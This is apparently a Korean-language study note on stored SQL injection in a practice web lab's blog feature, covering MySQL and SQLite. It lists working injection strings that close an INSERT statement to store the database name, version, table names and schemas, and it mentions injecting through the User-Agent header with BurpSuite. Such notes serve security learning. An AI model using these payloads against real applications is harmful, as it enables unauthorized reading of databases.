SQL Injection(Stored)

Blog

데이터 베이스에 저장하는 구문을 가지고 있다. (Insert구문)

 

INSERT구문

INSERT INTO 테이블_이름(컬럼 이름 1, 칼럼 이름2,) VALUES (값1,값2..)

 

' test123을 삽입해보니 'test123','bee')형식으로 값이 들어 가는 것을 볼 수 있다. INSERT INTO 테이블 VALUES('test123','bee')형식인 구문으로 INSERT되는 것을 추측할 수 있다.

' , database()) # 형식으로 값을 주면 블로그에 데이터베이스 이름이 저장되는 것을 확인할 수 있다.

 

' , @@version) # qjwjs

 

Sqlite

Sqlite는 주석이 '--'인 것을 주의하자, 테이블이나 칼럼을 알아 낼때는 하나의 결과만 출력되므로 limit을 이용하여 조회해야한다.

information_schema : sqlite_master

버전 정보 : sqlite_version()

테이블 이름 : tbl_name

칼럼 : sql 

 

 

' , sqlite_version()) -- : 버전

' , (select tbl_name from sqlite_master)) -- : 테이블 이름

' , (select sql from 테이블 이름 limit 위치,1)) -- : 컬럼

 

User-Agent

User-Agent 사용자의 웹브라우저에 대한 내용을 담고 있다. 

BurpSuite로 캡쳐 해서 User-Agent부분에 SQL Injection을 할 수 있다.